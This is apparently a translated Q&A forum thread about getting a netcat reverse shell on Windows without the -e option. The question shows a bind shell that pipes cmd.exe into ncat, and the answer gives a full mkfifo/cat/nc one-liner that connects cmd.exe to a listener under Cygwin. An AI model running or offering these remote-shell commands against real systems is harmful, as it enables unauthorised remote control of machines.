Inversão de shell usando o netcat no Windows (sem opção -e)

1

Existe alguma maneira de obter um shell reverso no Windows usando o netcat sem usar a opção -e, pois ele aciona o UAC?

Eu fiz isso funcionar do Linux para o Linux usando um pipe nomeado. Eu queria alcançar algo semelhante no Windows.

A execução de c:\windows\system32\cmd.exe | ncat -l -p 666 no Windows fornece um prompt no Linux quando eu conecto:

# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user> dir

^C

Parece que estou perto, talvez algo simples esteja faltando? Se ao menos houvesse pipes nomeados no Windows ...

    
por Adriano_epifas 12.12.2017 / 06:18

1 resposta

1

Não tenho certeza se você pode fazê-lo com o win32 netcat puro, mas você pode fazê-lo no cygwin. Ouça em 1234 como nc -l 1234 , em seguida, conecte-se a isso em uma janela separada com este comando:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f

Observe que as teclas para cima e para baixo não funcionam para percorrer o histórico de comandos usando esse método.

    
por 12.12.2017 / 07:54